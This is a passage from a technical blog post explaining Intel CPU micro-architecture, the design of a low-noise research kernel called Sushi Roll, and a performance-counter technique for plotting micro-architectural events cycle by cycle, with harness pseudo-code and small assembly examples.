Follow me at @gamozolabs on Twitter if you want notifications when new blogs come up. I also do random one-off posts for cool data that doesn’t warrant an entire blog!

Summary

In this blog we’re going to go into details about a CPU research kernel I’ve developed: Sushi Roll. This kernel uses multiple creative techniques to measure undefined behavior on Intel micro-architectures. Sushi Roll is designed to have minimal noise such that tiny micro-architectural events can be measured, such as speculative execution and cache-coherency behavior. With creative use of performance counters we’re able to accurately plot micro-architectural activity on a graph with an x-axis in cycles.

We’ll go a lot more into detail about what everything in this graph means later in the blog, but here’s a simple example of just some of the data we can collect:

Example uarch activity Example cycle-by-cycle profiling of the Kaby Lake micro-architecture, warning: log-scale y-axis

Agenda

This is a relatively long blog and will be split into 4 major sections.

  • The gears that turn in your CPU: A high-level explanation of modern Intel micro-architectures
  • Sushi Roll: The design of the low-noise research kernel
  • Cycle-by-cycle micro-architectural introspection: A unique usage of performance counters to observe cycle-by-cycle micro-architectural behaviors
  • Results: Putting the pieces together and making graphs of cool micro-architectural behavior

Why?

In the past year I’ve spent a decent amount of time doing CPU vulnerability research. I’ve written proof-of-concept exploits for nearly every CPU vulnerability, from many attacker perspectives (user leaking kernel, user/kernel leaking hypervisor, guest leaking other guest, etc). These exploits allowed us to provide developers and researchers with real-world attacks to verify mitigations.

CPU research happens to be an overlap of my two primary research interests: vulnerability research and high-performance kernel development. I joined Microsoft in the early winter of 2017 and this lined up pretty closely with the public release of the Meltdown and Spectre CPU attacks. As I didn’t yet have much on my plate, the idea was floated that I could look into some of the CPU vulnerabilities. I got pretty lucky with this timing, as I ended up really enjoying the work and ended up sinking most of my free time into it.

My workflow for research often starts with writing some custom tools for measuring and analysis of a given target. Whether the target is a web browser, PDF parser, remote attack surface, or a CPU, I’ve often found that the best thing you can do is just make something new. Try out some new attack surface, write a targeted fuzzer for a specific feature, etc. Doing something new doesn’t have to be better or more difficult than something that was done before, as often there are completely unexplored surfaces out there. My specialty is introspection. I find unique ways to measure behaviors, which then fuels the idea pool for code auditing or fuzzer development.

This leads to an interesting situation in CPU research… it’s largely blind. Lots of the current CPU research is done based on writing snippets of code and reviewing the overall side-effects of it (via cache timing, performance counters, etc). These overall side-effects may also include noise from other processor activity, from the OS task switching processes, other cores changing the MESI-state of cache lines, etc. I happened to already have a low-noise no-shared-memory research kernel that I developed for vectorized emulation on Xeon Phis! This lead to a really good starting point for throwing in some performance counters and measuring CPU behaviors… and the results were a bit better than expected.

TL;DR: I enjoy writing tools to measure things, so I wrote a tool to measure undefined CPU behavior.


The gears that turn in your CPU

Feel free to skip this section entirely if you’re familiar with modern processor architecture

Your modern Intel CPU is a fairly complex beast when you care about every technical detail, but lets look at it from a higher level. Here’s what the micro-architecture (uArch) looks like in a modern Intel Skylake processor.

Skylake diagram Skylake uArch diagram, Diagram from WikiChip

There are 3 main components: The front end, which converts complex x86 instructions into groups of micro-operations. The execution engine, which executes the micro-operations. And the memory subsystem, which makes sure that the processor is able to get streams of instructions and data.


Front End

The front end covers almost everything related to figuring out which micro-operations (uops) need to be dispatched to the execution engine in order to accomplish a task. The execution engine on a modern Intel processor does not directly execute x86 instructions, rather these instructions are converted to these micro-operations which are fixed in size and specific to the processor micro-architecture.

Instruction fetch and cache

There’s a lot that happens prior to the actual execution of an instruction. First, the memory containing the instruction is read into the L1 instruction cache, ideally brought in from the L2 cache as to minimize delay. At this point the instruction is still a macro-op (a variable-length x86 instruction), which is quite a pain to work with. The processor still doesn’t know how large the instruction is, so during pre-decode the processor will do an initial length decode to determine the instruction boundaries.

At this point the instruction has been chopped up and is ready for the instruction queue!

Instruction Queue and Macro Fusion

Instructions that come in for execution might be quite simple, and could potentially be “fused” into a complex operation. This stage is not publicly documented, but we know that a very common fusion is combining compare instructions with conditional branches. This allows a common instruction pattern like:

cmp rax, 5
jne .offset

To be combined into a single macro-op with the same semantics. This complex fused operation now only takes up one slot in many parts of the CPU pipeline, rather than two, freeing up more resources to other operations.

Decode

Instruction decode is where the x86 macro-ops get converted into micro-ops. These micro-ops vary heavily by uArch, and allow Intel to regularly change fundamentals in their processors without affecting backwards compatibility with the x86 architecture. There’s a lot of magic that happens in the decoder, but mostly what matters is that the variable-length macro-ops get converted into the fixed-length micro-ops. There are multiple ways that this conversion happens. Instructions might directly convert to uops, and this is the common path for most x86 instructions. However, some instructions, or even processor conditions, may cause something called microcode to get executed.

Microcode

Some instructions in x86 trigger microcode to be used. Microcode is effectively a tiny collection of uops which will be executed on certain conditions. Think of this like a C/C++ macro, where you can have a one-liner for something that expands to much more. When an operation does something that requires microcode, the microcode ROM is accessed and the uops it specifies are placed into the pipeline. These are often complex operations, like switching operating modes, reading/writing internal CPU registers, etc. This microcode ROM also gives Intel an opportunity to make changes to instruction behaviors entirely with a microcode patch.

uop Cache

There’s also a uop cache which allows previously decoded instructions to skip the entire pre-decode and decode process. Like standard memory caching, this provides a huge speedup and dramatically reduces bottlenecks in the front-end.

Allocation Queue

The allocation queue is responsible for holding a bunch of uops which need to be executed. These are then fed to the execution engine when the execution engine has resources available to execute them.


Execution engine

The execution engine does exactly what you would expect: it executes things. But at this stage your processor starts moving your instructions around to speed things up.

Things start to get a bit complex at this point, click for details!

Renaming / Allocating / Retirement

Resources need to be allocated for certain operations. There are a lot more registers in the processor than the standard x86 registers. These registers are allocated out for temporary operations, and often mapped onto their corresponding x86 registers.

There are a lot of optimizations the CPU can do at this stage. It can eliminate register moves by aliasing registers (such that two x86 registers “point to” the same internal register). It can remove known zeroing instructions (like xor with self, or and with zero) from the pipeline, and just zero the registers directly. These optimizations are frequently improved each generation.

Finally, when instructions have completed successfully, they are retired. This retirement commits the internal micro-architectural state back out to the x86 architectural state. It’s also when memory operations become visible to other CPUs.

Re-ordering

uOP re-ordering is important to modern CPU performance. Future instructions which do not depend on the current instruction, could execute while waiting for the results of the current one.

For example:

mov rax, [rax]
add rbx, rcx

In this short example we see that we perform a 64-bit load from the address in rax and store it back into rax. Memory operations can be quite expensive, ranging from 4 cycles for a L1 cache hit, to 250 cycles and beyond for an off-processor memory access.

The processor is able to realize that the add rbx, rcx instruction does not need to “wait” for the result of the load, and can send off the add uop for execution while waiting for the load to complete.

This is where things can start to get weird. The processor starts to perform operations in a different order than what you told it to. The processor then holds the results and makes sure they “appear” to other cores in the correct order, as x86 is a strongly-ordered architecture. Other architectures like ARM are typically weakly-ordered, and it’s up to the developer to insert fences in the instruction stream to tell the processor the specific order operations need to complete in. This ordering is not an issue on a single core, but it may affect the way another core observes the memory transactions you perform.

For example:

Core 0 executes the following:

mov [shared_memory.pointer], rax ; Store the pointer in `rax` to shared memory
mov [shared_memory.owned],   0   ; Mark that we no longer own the shared memory

Core 1 executes the following:

.try_again:
    cmp [shared_memory.owned], 0 ; Check if someone owns this memory
    jne .try_again               ; Someone owns this memory, wait a bit longer

    mov rax, [shared_memory.pointer] ; Get the pointer
    mov rax, [rax]                   ; Read from the pointer

On x86 this is safe, as all aligned loads and stores are atomic, and are commit in a way that they appear in-order to all other processors. On something like ARM the owned value could be written to prior to pointer being written, allowing core 1 to use a stale/invalid pointer.

Execution Units

Finally we got to an easy part: the execution units. This is the silicon that is responsible for actually performing maths, loads, and stores. The core has multiple copies of this hardware logic for some of the common operations, which allows the same operation to be performed in parallel on separate data. For example, an add can be performed on 4 different execution units.

For things like loads, there are 2 load ports (port 2 and port 3), this allows 2 independent loads to be executed per cycle. Stores on the other hand, only have one port (port 4), and thus the core can only perform one store per cycle.


Memory subsystem

The memory subsystem on Intel is pretty complex, but we’re only going to go into the basics.

Caches

Caches are critical to modern CPU performance. RAM latency is so high (150-250 cycles) that a CPU is largely unusable without a cache. For example, if a modern x86 processor at 2.2 GHz had all caches disabled, it would never be able to execute more than ~15 million instructions per second. That’s as slow as an Intel 80486 from 1991.

When working on my first hypervisor I actually disabled all caching by mistake, and Windows took multiple hours to boot. It’s pretty incredible how important caches are.

For x86 there are typically 3 levels of cache: A level 1 cache, which is extremely fast, but small: 4 cycles latency. Followed by a level 2 cache, which is much larger, but still quite small: 14 cycles latency. Finally there’s the last-level-cache (LLC, typically the L3 cache), this is quite large, but has a higher latency: ~60 cycles.

The L1 and L2 caches are present in each core, however, the L3 cache is shared between multiple cores.

Translation Lookaside Buffers (TLBs)

In modern CPUs, applications almost never interface with physical memory directly. Rather they go through address translation to convert virtual addresses to physical addresses. This allows contiguous virtual memory regions to map to fragmented physical memory. Performing this translation requires 4 memory accesses (on 64-bit 4-level paging), and is quite expensive. Thus the CPU caches recently translated addresses such that it can skip this translation process during memory operations.

It is up to the OS to tell the CPU when to flush these TLBs via an invalidate page, invlpg instruction. If the OS doesn’t correctly invlpg memory when mappings change, it’s possible to use stale translation information.

Line fill buffers

While a load is pending, and not yet present in L1 cache, the data lives in a line fill buffer. The line fill buffers live between L2 cache and your L1 cache. When a memory access misses L1 cache, a line fill buffer entry is allocated, and once the load completes, the LFB is copied into the L1 cache and the LFB entry is discarded.

Store buffer

Store buffers are similar to line fill buffers. While waiting for resources to be available for a store to complete, it is placed into a store buffer. This allows for up to 56 stores (on Skylake) to be queued up, even if all other aspects of the memory subsystem are currently busy, or stores are not ready to be retired.

Further, loads which access memory will query the store buffers to potentially bypass the cache. If a read occurs on a recently stored location, the read could directly be filled from the store buffers. This is called store forwarding.

Load buffers

Similar to store buffers, load buffers are used for pending load uops. This sits between your execution units and L1 cache. This can hold up to 72 entries on Skylake.

CPU architecture summary and more info

That was a pretty high level introduction to many of the aspects of modern Intel CPU architecture. Every component of this diagram could have an entire blog written on it. Intel Manuals, WikiChip, Agner Fog’s CPU documentation, and many more, provide a more thorough documentation of Intel micro-architecture.


Sushi Roll

Sushi Roll is one of my favorite kernels! It wasn’t originally designed for CPU introspection, but it had some neat features which made it much more suitable for CPU research than my other kernels. We’ll talk a bit about why this kernel exists, and then talk about why it quickly became my go-to kernel for CPU research.

Kernel mascot: Squishble Sushi Roll

A primer on Knights Landing

Sushi Roll was originally designed for my Vectorized Emulation work. Vectorized emulation was designed for the Intel Xeon Phi (Knights Landing), which is a pretty strange architecture. Even though it’s fully-featured traditional x86, standard software will “just work” on it, it is quite slow per individual thread. First of all, the clock rates are ~1.3 GHz, so there alone it’s about 2-3x slower than a “standard” x86 processor. Even further, it has fewer CPU resources for re-ordering and instruction decode. All-in-all the CPU is about 10x slower when running a single-threaded application compared to a “standard” 3 GHz modern Intel CPU. There’s also no L3 cache, so memory accesses can become much more expensive.

On top of these simple performance issues, there are more complex issues due to 4-way hyperthreading. Knights Landing was designed to be 4-way hyperthreaded (4 threads per core) to alleviate some of the performance losses of the limited instruction decode and caching. This allows threads to “block” on memory accesses while other threads with pending computations use the execution units. This 4-way hyperthreading, combined with 64-core processors, leads to 256 hardware threads showing up to your OS as cores.

Migrating processes and resources between these threads can be catastrophically slow. Standard shared-memory models also start to fall apart at this level of scaling (without specialized tuning). For example: If all 256 threads are hammering the same memory by performing an atomic increment (lock inc instruction), each individual increment will start to cost over 10,000 cycles! This is enough time for a single core on the Xeon Phi to do 640,000 single-precision floating point operations… just from a single increment! While most software treats atomics as “free locks”, they start to cause some serious cache-coherency pollution when scaled out this wide.

Obviously with some careful development you can mitigate these issues by decreasing the frequency of shared memory accesses. But perhaps we can develop a kernel that fundamentally disallows this behavior, preventing a developer from ever starting to go down the wrong path!

The original intent of Sushi Roll

Sushi Roll was designed from the start to be a massively parallel message-passing based kernel. The most notable feature of Sushi Roll is that there is no mutable shared memory allowed (a tiny exception made for the core IPC mechanism). This means that if you ever want to share information with another processor, you must pass that information via IPC. Shared immutable memory however, is allowed, as this doesn’t cause cache coherency traffic.

This design also meant that a lock never needed to be held, even atomic-level locks using the lock prefix. Rather than using locks, a specific core would own a hardware resource. For example, core #0 may own the network card, or a specific queue on the network card. Instead of requesting exclusive access to the NIC by obtaining a lock, you would send a message to core #0, indicating that you want to send a packet. All of the processing of these packets is done by the sender, thus the data is already formatted in a way that can be directly dropped into the NIC ring buffers. This made the owner of a hardware resource simply a mediator, reducing the latency to that resource.

While this makes the internals of the kernel a bit more complex, the programming model that a developer sees is still a standard send()/recv() model. By forcing message-passing, this ensured that all software written for this kernel could be scaled between multiple machines with no modification. On a single computer there is a fast, low-latency IPC mechanism that leverages some of the abilities to share memory (by transferring ownership of physical memory to the receiver). If the target for a message resided on another computer on the network, then the message would be serialized in a way that could be sent over the network. This complexity is yet again hidden from the developer, which allows for one program to be made that is scaled out without any extra effort.

No interrupts, no timers, no software threads, no processes

Sushi Roll follows a similar model to most of my other kernels. It has no interrupts, no timers, no software threads, and no processes. These are typically required for traditional operating systems, as to provide a user experience with multiple processes and users. However, my kernels are always designed for one purpose. This means the kernel boots up, and just does a given task on all cores (sometimes with one or two cores having a “special” responsibility).

By removing all of these external events, the CPU behaves a lot more deterministically. Sushi Roll goes the extra mile here, as it further reduces CPU noise by not having cores sharing memory and causing unexpected cache evictions or coherency traffic.

Soft Reboots

Similar to kexec on Linux, my kernels always support soft rebooting. This allows the old kernel (even a double faulted/corrupted kernel) to be replaced by a new kernel. This process takes about 200-300ms to tear down the old kernel, download the new one over PXE, and run the new one. This makes it feasible to have such a specialized kernel without processes, since I can just change the code of the kernel and boot up the new one in under a second. Rapid prototyping is crucial to fast development, and without this feature this kernel would be unusable.

Sushi Roll conclusion

Sushi Roll ended up being the perfect kernel for CPU introspection. It’s the lowest noise kernel I’ve ever developed, and it happened to also be my flagship kernel right as Spectre and Meltdown came out. By not having processes, threads, or interrupts, the CPU behaves much more deterministically than in a traditional OS.


Performance Counters

Before we get into how we got cycle-by-cycle micro-architectural data, we must learn a little bit about the performance monitoring available on Intel CPUs! This information can be explored in depth in the Intel System Developer Manual Volume 3b (note that the combined volume 3 manual doesn’t go into as much detail as the specific sub-volume manual).

Performance Counter Manual

Intel CPUs have a performance monitoring subsystem relying largely on a set of model-specific-registers (MSRs). These MSRs can be configured to track certain architectural events, typically by counting them. These counters are formally “performance monitoring counters”, often referred to as “performance counters” or PMCs.

These PMCs vary by micro-architecture. However, over time Intel has committed to offering a small subset of counters between multiple micro-architectures. These are called architectural performance counters. The version of these architectural performance counters are found in CPUID.0AH:EAX[7:0]. As of this writing there are 4 versions of architectural performance monitoring. The latest version provides a decent amount of generic information useful to general-purpose optimization. However, for a specific micro-architecture, the possibilities of performance events to track are almost limitless.

Basic usage of performance counters

To use the performance counters on Intel there are a few steps involved. First you must find a performance event you want to monitor. This information is found in per-micro-architecture tables found in the Intel Manual Volume 3b “Performance-Monitoring Events” chapter.

For example, here’s a very small selection of Skylake-specific performance events:

Skylake Events

Intel performance counters largely rely on two banks of MSRs. The performance event selection MSRs, where the different events are programmed using the umask and event numbers from the table above. And the performance counter MSRs which hold the counts themselves.

The performance event selection MSRs (IA32_PERFEVTSELx) start at address 0x186 and span a contiguous MSR region. The layout of these event selection MSRs varies slightly by micro-architecture. The number of counters available varies by CPU and is dynamically checked by reading CPUID.0AH:EAX[15:8]. The performance counter MSRs (IA32_PMCx) start at address 0xc1 and also span a contiguous MSR region. The counters have an micro-architecture-specific number of bits they support, found in CPUID.0AH:EAX[23:16]. Reading and writing these MSRs is done via the rdmsr and wrmsr instructions respectively.

Typically modern Intel processors support 4 PMCs, and thus will have 4 event selection MSRs (0x186, 0x187, 0x188, and 0x189) and 4 counter MSRs (0xc1, 0xc2, 0xc3, and 0xc4). Most processors have 48-bit performance counters. It’s important to dynamically detect this information!

Here’s what the IA32_PERFEVTSELx MSR looks like for PMC version 3:

Performance Event Selection

Field Meaning
Event Select Holds the event number from the event tables, for the event you are interested in
Unit Mask Holds the umask value from the event tables, for the event you are interested in
USR If set, this counter counts during user-land code execution (ring level != 0)
OS If set, this counter counts during OS execution (ring level == 0)
E If set, enables edge detection of the event being tracked. Counts de-asserted to asserted transitions, which allows for timing of events
PC Pin control allows for some hardware monitoring of events, like… the actual pins on the CPU
INT Generate an interrupt through the APIC if an overflow occurs of the (usually 48-bit) counter
ANY Increment the performance event when any hardware thread on a given physical core triggers the event, otherwise it only increments for a single logical thread
EN Enable the counter
INV Invert the counter mask, which changes the meaning of the CMASK field from a >= comparison (if this bit is 0), to a < comparison (if this bit is 1)
CMASK If non-zero, the CPU only increments the performance counter when the event is triggered >= (or < if INV is set) CMASK times in a single cycle. This is useful for filtering events to more specific situations. If zero, this has no effect and the counter is incremented for each event

And that’s about it! Find the right event you want to track in your specific micro-architecture’s table, program it in one of the IA32_PERFEVTSELx registers with the correct event number and umask, set the USR and/or OS bits depending on what type of code you want to track, and set the E bit to enable it! Now the corresponding IA32_PMCx counter will be incrementing every time that event occurs!

Reading the PMC counts faster

Instead of performing a rdmsr instruction to read the IA32_PMCx values, instead a rdpmc instruction can be used. This instruction is optimized to be a little bit faster and supports a “fast read mode” if ecx[31] is set to 1. This is typically how you’d read the performance counters.

Performance Counters version 2

In the second version of performance counters, Intel added a bunch of new features.

Intel added some fixed performance counters (IA32_FIXED_CTR0 through IA32_FIXED_CTR2, starting at address 0x309) which are not programmable. These are configured by IA32_FIXED_CTR_CTRL at address 0x38d. Unlike normal PMCs, these cannot be programmed to count any event. Rather the controls for these only allows the selection of which CPU ring level they increment at (or none to disable it), and whether or not they trigger an interrupt on overflow. No other control is provided for these.

Fixed Performance Counter MSR Meaning
IA32_FIXED_CTR0 0x309 Counts number of retired instructions
IA32_FIXED_CTR1 0x30a Counts number of core cycles while the processor is not halted
IA32_FIXED_CTR2 0x30b Counts number of timestamp counts (TSC) while the processor is not halted

These are then enabled and disabled by:

Fixed Counter Control

The second version of performance counters also added 3 new MSRs that allow “bulk management” of performance counters. Rather than checking the status and enabling/disabling each performance counter individually, Intel added 3 global control MSRs. These are IA32_PERF_GLOBAL_CTRL (address 0x38f) which allows enabling and disabling performance counters in bulk. IA32_PERF_GLOBAL_STATUS (address 0x38e) which allows checking the overflow status of all performance counters in one rdmsr. And IA32_PERF_GLOBAL_OVF_CTRL (address 0x390) which allows for resetting the overflow status of all performance counters in one wrmsr. Since rdmsr and wrmsr are serializing instructions, these can be quite expensive and being able to reduce the amount of them is important!

Global control (simple, allows masking of individual counters from one MSR):

Performance Global Control

Status (tracks overflows of various counters, with a global condition changed tracker):

Performance Global Status

Status control (writing a 1 to any of these bits clears the corresponding bit in IA32_PERF_GLOBAL_STATUS):

Performance Global Status

Finally, Intel added 2 bits to the existing IA32_DEBUGCTL MSR (address 0x1d9). These 2 bits Freeze_LBR_On_PMI (bit 11) and Freeze_PerfMon_On_PMI (bit 12) allow freezing of last branch recording (LBR) and performance monitoring on performance monitor interrupts (often due to overflows). These are designed to reduce the measurement of the interrupt itself when an overflow condition occurs.

Performance Counters version 3

Performance counters version 3 was pretty simple. Intel added the ANY bit to IA32_PERFEVTSELx and IA32_FIXED_CTR_CTRL to allow tracking of performance events on any thread on a physical core. Further, the performance counters went from a fixed number of 2 counters, to a variable amount of counters. This resulted in more bits being added to the global status, overflow, and overflow control MSRs, to control the corresponding counters.

Performance Global Status

Performance Counters version 4

Performance counters version 4 is pretty complex in detail, but ultimately it’s fairly simple. Intel renamed some of the MSRs (for example IA32_PERF_GLOBAL_OVF_CTRL became IA32_PERF_GLOBAL_STATUS_RESET). Intel also added a new MSR IA32_PERF_GLOBAL_STATUS_SET (address 0x391) which instead of clearing the bits in IA32_PERF_GLOBAL_STATUS, allows for setting of the bits.

Further, the freezing behavior enabled by IA32_DEBUGCTL.Freeze_LBR_On_PMI and IA32_DEBUGCTL.Freeze_PerfMon_On_PMI was streamlined to have a single bit which tracks the “freeze” state of the PMCs, rather than clearing the corresponding bits in the IA32_PERF_GLOBAL_CTRL MSR. This change is awesome as it reduces the cost of freezing and unfreezing the performance monitoring unit (PMU), but it’s actually a breaking change from previous versions of performance counters.

Finally, they added a mechanism to allow sharing of performance counters between multiple users. This is not really relevant to anything we’re going to talk about, so we won’t go into details.

Conclusion

Performance counters started off pretty simple, but Intel added more and more features over time. However, these “new” features are critical to what we’re about to do next :)


Cycle-by-cycle micro-architectural sampling

Now that we’ve gotten some prerequisites out of the way, lets talk about the main course of this blog: A creative use of performance counters to get cycle-by-cycle micro-architectural information out of Intel CPUs!

It’s important to note that this technique is meant to assist in finding and learning things about CPUs. The data it generates is not particularly easy to interpret or work with, and there are many pitfalls to be aware of!

The Goal

Performance counters are incredibly useful in categorizing micro-architectural behavior on an Intel CPU. However, these counters are often used on a block or whole program entirely, and viewed as a single data point over the whole run. For example, one might use performance counters to track the number of times there’s a cache miss in their program under test. This will give a single number as an output, giving an indication of how many times the cache was missed, but it doesn’t help much in telling you when they occurred. By some binary searching (or creative use of counter overflows) you can get a general idea of when the event occurred, but I wanted more information.

More specifically, I wanted to view micro-architectural data on a graph, where the x-axis was in cycles. This would allow me to see (with cycle-level granularity) when certain events happened in the CPU.

The Idea

We’ve set a pretty lofty goal for ourselves. We effectively want to link two performance counters with each other. In this case we want to use an arbitrary performance counter for some event we’re interested in, and we want to link it to a performance counter tracking the number of cycles elapsed. However, there doesn’t seem to be a direct way to perform this linking.

We know that we can have multiple performance counters, so we can configure one to count a given event, and another to count cycles. However, in this case we’re not able to capture information at each cycle, as we have no way of reading these counters together. We also cannot stop the counters ourselves, as stopping the counters requires injecting a wrmsr instruction which cannot be done on an arbitrary cycle boundary, and definitely cannot be done during speculation.

But there’s a small little trick we can use. We can stop multiple performance counters at the same time by using the IA32_DEBUGCTL.Freeze_PerfMon_On_PMI feature. When a counter ends up overflowing, an interrupt occurs (if configured as such). When this overflow occurs, the freeze bit in IA32_PERF_GLOBAL_STATUS is set (version 4 PMCs specific feature), causing all performance counters to stop.

This means that if we can cause an overflow on each cycle boundary, we could potentially capture the time and the event we’re interested in at the same time. Doing this isn’t too difficult either, we can simply pre-program the performance counter value IA32_PMCx to N away from overflow. In our specific case, we’re dealing with a 48-bit performance counter. So in theory if we program PMC0 to count number of cycles, set the counter to 2^48 - N where N is >= 1, we can get an interrupt, and thus an “atomic” disabling of performance counters after N cycles.

If we set up a deterministic enough execution environment, we can run the same code over and over, while adjusting N to sample the code at a different cycle count.

This relies on a lot of assumptions. We’re assuming that the freeze bit ends up disabling both performance counters at the same time (“atomically”), we’re assuming we can cause this interrupt on an arbitrary cycle boundary (even during multi-cycle instructions), and we also are assuming that we can execute code in a clean enough environment where we can do multiple runs measuring different cycle offsets.

So… lets try it!

The Implementation

A simple pseudo-code implementation of this sampling method looks as such:

/// Number of times we want to sample each data point. This allows us to look
/// for the minimum, maximum, and average values. This also gives us a way to
/// verify that the environment we're in is deterministic and the results are
/// sane. If minimum == maximum over many samples, it's safe to say we have a
/// very clear picture of what is happening.
const NUM_SAMPLES: u64 = 1000;

/// Maximum number of cycles to sample on the x-axis. This limits the sampling
/// space.
const MAX_CYCLES: u64 = 1000;

// Program the APIC to map the performance counter overflow interrupts to a
// stub assembly routine which simply `iret`s out
configure_pmc_interrupts_in_apic();

// Configure performance counters to freeze on interrupts
perf_freeze_on_overflow();

// Iterate through each performance counter we want to gather data on
for perf_counter in performance_counters_of_interest {
    // Disable and reset all performance counters individually
    // Clearing their counts to 0, and clearing their event select MSRs to 0
    disable_all_perf_counters();

    // Disable performance counters globally by setting IA32_PERF_GLOBAL_CTRL
    // to 0
    disable_perf_globally();

    // Enable a performance counter (lets say PMC0) to track the `perf_counter`
    // we're interested in. Note that this doesn't start the counter yet, as we
    // still have the counters globally disabled.
    enable_perf_counter(perf_counter);

    // Go through each number of samples we want to collect for this performance
    // counter... for each cycle offset.
    for _ in 0..NUM_SAMPLES {
        // Go through each cycle we want to observe
        for cycle_offset in 1..=MAX_CYCLES {
            // Clear out the performance counter values: IA32_PMCx fields
            clear_perf_counters();

            // Program fixed counter #1 (un-halted cycle counter) to trigger
            // an interrupt on overflow. This will cause an interrupt, which
            // will then cause a freeze of all PMCs.
            program_fixed1_interrupt_on_overflow();

            // Program the fixed counter #1 (un-halted cycle counter) to
            // `cycles` prior to overflowing
            set_fixed1_value((1 << 48) - cycle_offset);

            // Do some pre-test environment setup. This is important to make
            // sure we can sample the code under test multiple times and get
            // the same result. Here is where you'd be flushing cache lines,
            // maybe doing a `wbinvd`, etc.
            set_up_environment();

            // Enable both the fixed #1 cycle counter and the PMC0 performance
            // counter (tracking the stat we're interested in) at the same time,
            // by using IA32_PERF_GLOBAL_CTRL. This is serializing so you don't
            // have to worry about re-ordering across this boundary.
            enable_perf_globally();

            asm!(r#"

                asm
                under
                test
                here

            "# :::: "volatile");

            // Clear IA32_PERF_GLOBAL_CTRL to 0 to stop counters
            disable_perf_globally();

            // If fixed PMC #1 has not overflowed, then we didn't capture
            // relevant data. This only can happen if we tried to sample a
            // cycle which happens after the assembly under test executed.
            if fixed1_pmc_overflowed() == false {
                continue;
            }

            // At this point we can do whatever we want as the performance
            // counters have been turned off by the interrupt and we should have
            // relevant data in both :)

            // Get the count from fixed #1 PMC. It's important that we grab this
            // as interrupts are not deterministic, and thus it's possible we
            // "overshoot" the target
            let fixed1_count = read_fixed1_counter();

            // Add the distance-from-overflow we initially programmed into the
            // fixed #1 counter, with the current value of the fixed #1 counter
            // to get the total number of cycles which have elapsed during
            // our example.
            let total_cycles = cycle_offset + fixed1_count;

            // Read the actual count from the performance counter we were using.
            // In this case we were using PMC #0 to track our event of interest.
            let value = read_pmc0();

            // Somehow log that performance counter `perf_counter` had a value
            // `value` `total_cycles` into execution
            log_result(perf_counter, value, total_cycles);
        }
    }
}

Simple results

So? Does it work? Let’s try with a simple example of code that just does a few “nops” by adjusting the stack a few times:

add rsp, 8
sub rsp, 8
add rsp, 8
sub rsp, 8

Simple Sample

So how do we read this graph? Well, the x-axis is simple. It’s the time, in cycles, of execution. The y-axis is the number of events (which varies based on the key). In this case we’re only graphing the number of instructions retired (successfully executed).

So does this look right? Hmmm…. we ran 4 instructions, why did we see 8 retire?

Well in this case there’s a little bit of “extra” noise introduced by the harnessing around the code under test. Let’s zoom out from our code and look at what actually executes during our test:

; Right before test, we end up enabling all performance counters at once by
; writing 0x2_0000_000f to IA32_PERF_GLOBAL_CTRL. This enables all 4
; programmable counters at the same time as enabling fixed PMC #1 (cycle count)
00000000  B98F030000        mov ecx,0x38f ; IA32_PERF_GLOBAL_CTRL
00000005  B80F000000        mov eax,0xf
0000000A  BA02000000        mov edx,0x2
0000000F  0F30              wrmsr

; Here's our code under test :D
00000011  4883C408          add rsp,byte +0x8
00000015  4883EC08          sub rsp,byte +0x8
00000019  4883C408          add rsp,byte +0x8
0000001D  4883EC08          sub rsp,byte +0x8

; And finally we disable all counters by setting IA32_PERF_GLOBAL_CTRL to 0
00000021  B98F030000        mov ecx,0x38f
00000026  31C0              xor eax,eax
00000028  31D2              xor edx,edx
0000002A  0F30              wrmsr

So if we take another look at the graph, we see there are 8 instructions that retired. The very first instruction we see retire (at cycle=11), is actually the wrmsr we used to enable the counters. This makes sense, at some point prior to retirement of the wrmsr instruction the counters must be enabled internally somewhere in the CPU. So we actually get to see this instruction retire!

Then we see 7 more instructions retire to give us a total of 8… hmm. Well, we have 4 of our add and sub mix that we executed, so that brings us down to 3 more remaining “unknown” instructions.

These 3 remaining instructions are explained by the code which disables the performance counter after our test code has executed. We have 1 mov, and 2 xor instructions which retire prior to the wrmsr which disables the counters. It makes sense that we never see the final wrmsr retire as the counters will be turned off in the CPU prior to the wrmsr instruction retiring!

Wala! It all makes sense. We now have a great view into what the CPU did in terms of retirement for this code in question. Everything we saw lined up with what actually executed, always good to see.

A bit more advanced result

Lets add a few more performance counters to track. In this case lets track the number of instructions retired, as well as the number of micro-ops dispatched to port 4 (the store port). This will give us the number of stores which occurred during test.

Code to test (just a few writes to the stack):

; Right before test, we end up enabling all performance counters at once by
; writing 0x2_0000_000f to IA32_PERF_GLOBAL_CTRL. This enables all 4
; programmable counters at the same time as enabling fixed PMC #1 (cycle count)
00000000  B98F030000        mov ecx,0x38f
00000005  B80F000000        mov eax,0xf
0000000A  BA02000000        mov edx,0x2
0000000F  0F30              wrmsr

00000011  4883EC08          sub rsp,byte +0x8
00000015  48C7042400000000  mov qword [rsp],0x0
0000001D  4883C408          add rsp,byte +0x8
00000021  4883EC08          sub rsp,byte +0x8
00000025  48C7042400000000  mov qword [rsp],0x0
0000002D  4883C408          add rsp,byte +0x8

; And finally we disable all counters by setting IA32_PERF_GLOBAL_CTRL to 0
00000031  B98F030000        mov ecx,0x38f
00000036  31C0              xor eax,eax
00000038  31D2              xor edx,edx
0000003A  0F30              wrmsr

Store Sample

This one is fun. We simply make room on the stack (sub rsp), write a 0 to the stack (mov [rsp]), and then restore the stack (add rsp), and then do it all again one more time.

Here we added another plot to the graph, Port 4, which is the store uOP port on the CPU. We also track the number of instructions retired, as we did in the first example. Here we can see instructions retired matches what we would expect. We see 10 retirements, 1 from the first wrmsr enabling the performance counters, 6 from our own code under test, and 3 more from the disabling of the performance counters.

This time we’re able to see where the stores occur, and indeed, 2 stores do occur. We see a store happen at cycle=28 and cycle=29. Interestingly we see the stores are back-to-back, even though there’s a bit of code between them. We’re probably observing some re-ordering! Later in the graph (cycle=39), we observe that 4 instructions get retired in a single cycle! How cool is that?!

How deep can we go?

Using the exact same store example from above, we can enable even more performance counters. This gives us an even more detailed view of different parts of the micro-architectural state.

Busy Sample

In this case we’re tracking all uOP port activity, machine clears (when the CPU resets itself after speculation), offcore requests (when messages get sent offcore, typically to access physical memory), instructions retired, and branches retired. In theory we can measure any possible performance counter available on our micro-architecture on a time domain. This gives us the ability to see almost anything that is happening on the CPU!

Noise…

In all of the examples we’ve looked at, none of the data points have visible error bars. In these graphs the error bars represent the minimum value, mean value, and maximum value observed for a given data point. Since we’re running the same code over and over, and sampling it at different execution times, it’s very possible for “random” noise to interfere with results. Let’s look at a bit more noisy example:

; Right before test, we end up enabling all performance counters at once by
; writing 0x2_0000_000f to IA32_PERF_GLOBAL_CTRL. This enables all 4
